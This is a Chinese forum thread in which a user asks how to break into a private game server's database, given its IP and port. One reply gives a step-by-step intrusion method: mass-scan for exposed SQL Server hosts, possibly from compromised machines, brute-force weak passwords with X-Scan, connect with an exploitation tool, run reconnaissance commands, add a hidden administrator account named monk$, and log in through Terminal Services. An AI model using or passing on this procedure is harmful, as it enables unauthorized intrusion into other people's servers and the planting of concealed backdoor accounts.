是这样的有了ip和端口,如何检测弱口令或者扫漏洞
最近在玩私服,想试试。有工具弱口令,并且ip和端口都拿到了。一直尝试弱口令慢慢试的话,也不知道要到什么时候。
所以在想各位大大们有没有更好的思路,如果是直接扫描漏洞进行访问又该怎么做呢?
算是半小白,还在学习, asd760615372 发表于 2020-7-31 03:16
很显然他只是一个MysQL的数据库,我360流量看的端口是4405,但是如果使用工具登录的话必须是本地端口3306 ...
既然端口都改了,弱口令几乎就别想了 本帖最后由 yi0309 于 2020-7-31 03:14 编辑
希望对你有用,不知道您用的是那用服务器
第一步:
用s大面积扫描开放1433端口的活动主机。
(在安装xp sp2之后,s之类的并发线程很大的扫描工具不能正常使用,可以在其他操作系统环境下扫描,或者用肉鸡扫)
第二步:
把扫描结果保存为文本,并处理成一行一个ip的格式
第三步:
使用xsacn,载入扫描主机列表文件(就是第二步保存的文本),配置好字典(xscan自带有一套),在扫描选项里只勾选sql弱口令,开始扫描。
(大面积扫描不建议挂载十分复杂的字典,注意这是弱口令,所以使用常规字典就可以,加快速度)
第四步:
喝杯茶,看会电视,唱唱歌,去溜达一圈。等着扫描报告吧。
xsacn扫描完成后会自动生成扫描报告,里面有详细结果。
第五步:
利用sql综合利用工具连接上面得到的弱口令主机。先看看能不能使用dos命令
以下是一部分常用的命令
dir c:\ //浏览c盘
type c:\boot.ini //显示boot.ini的内容,用于查看操作系统类型与版本
ver //功能同上
net start //查看系统启动的服务
netstat -na //查看端口开发情况
net user //查看当前系统用户情况
net user monk$ monk /add //添加一个名为monk$密码为monk的用户
net localgroup administrators monk$ /add //将monk$用户加入管理组
为什么要建立monk$这样一个用户呢?因为用户名后面带 $符号后,管理员使用:net user 看不到,但缺点就是在管理面板中可以看到。(强一点的隐藏方法是帐号克隆,这里就不说了)
如果我们发现服务器的 终端服务:terminal service是开放的,对方又是2000或者2003服务器,那么我们可以直接添加用户,远程登陆。
如果还是不行等待其他大神出现,或者去问下度娘,我不是大神但多少懂点 yi0309 发表于 2020-7-31 03:03
希望对你有用,不知道您用的是那用服务器
第一步:
很显然他只是一个MysQL的数据库,我360流量看的端口是4405,但是如果使用工具登录的话必须是本地端口3306.如果这样的话按照你的方法是否可以 按照我这个有点反锁,或等其他大神看看那个实用 传奇私服是这样搞,但是效果并不太乐观, 以前也学过破解,但是总是在函数跳转的地方弄错,也没成功过 显然我不知道你是想入侵拿到服务器然后玩GM号呢?还是想破解什么呢? 弱口令基本可以不想。想办法搞定强口令吧。。。 是mysql弱口令吗 有工具可以扫啊 端口改了也一样 改下扫描端口
我记得可以用工具扫描来着
页:
[1]
2